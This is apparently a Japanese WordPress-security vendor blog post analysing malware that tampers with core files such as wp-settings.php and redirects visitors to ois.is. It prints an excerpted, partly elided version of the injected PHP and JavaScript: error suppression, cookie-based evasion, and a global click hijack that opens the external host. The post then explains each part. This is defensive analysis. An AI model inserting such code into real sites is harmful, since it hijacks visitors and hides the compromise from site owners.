昨今非常に増えているois.is の画像ファイルが不正に埋め込まれるタイプのマルウェアの事例をご紹介いたします。
ois.isから画像に偽装した不正なプログラムを読みこんで、ワードプレスサイトで実行するマルウェア
このマルウェアは、ワードプレスの管理者権限の奪取や、脆弱性を突いて、ワードプレスの主要なファイルに不正なコードを埋め込みます。
ワードプレスの主要ファイルに、追加する形でコードを埋め込んで感染しますので、そのファイル自体を削除しますと、サイトの動作不全を引き起こすため、改ざん部分だけを慎重に取り除かないといけません。
↓よく改ざんされるファイルは下記となります。
wp-settings.php
wp-comments-post.php
xmlrpc.php
wp-trackback.php
wp-blog-header.php
wp-signup.php
wp-cron.php
wp-links-opml.php
マルウェアのコード
マルウェアのコードを見ていきましょう。このマルウェアの改ざん部分は下記のようになっています。
error_reporting(0);
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('display_errors', 0);
$ckUjYggTf = 0;
foreach($_COOKIE as $vUjUnHvOOoO => $vvvUjUnHvOOoO){
1(中略)
break;
}
}
中略
function globalClick(event) {
const host = location.host
const newLocation = \"https://ois.is/images/logo.png\"
2(中略)
const hoursDiff = getHoursDiff(nowDate, storageDate)
console.log(nowDate, storageDate, hoursDiff)
if (hoursDiff >= allowedHours) {
addToStorage(host, nowDate);
window.open(newLocation, \"_blank\");
}
3(中略)
window.open(newLocation, \"_blank\");
}
}
document.addEventListener(\"click\", globalClick);
})();</script>";
}
ini_set の部分で、コードのエラーやワーニングを出力しないようにしています。
1 の部分で、ユーザーのCOOKIEに時間を記録し、稀な頻度でしかマルウェアが実行されないようにして、マルウェア感染の発覚を遅らせる仕組みになっています。
2 の部分で、外部のois.is というサーバーから、画像に偽装した、マルウェア本体の不正なコードを取得しています。 この中にユーザーがサイトに訪ねたときに、強制的に別のサイトに飛ばしてしまう、リダイレクトハックと呼ばれる不正なURLのリストが含まれています。
3 の部分で、コードの実行、また、サイト上のクリックを乗っ取って、何らかのリンクをクリックするとリダイレクトハックが発現するようになっています。
このマルウェアの検出と駆除は下記のプラグインで可能です。ぜひお試しください。
【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
WordPress ワードプレスのマルウェアの駆除を専門家が高精度で代行いたします。お気軽にご依頼・ご相談お送りください
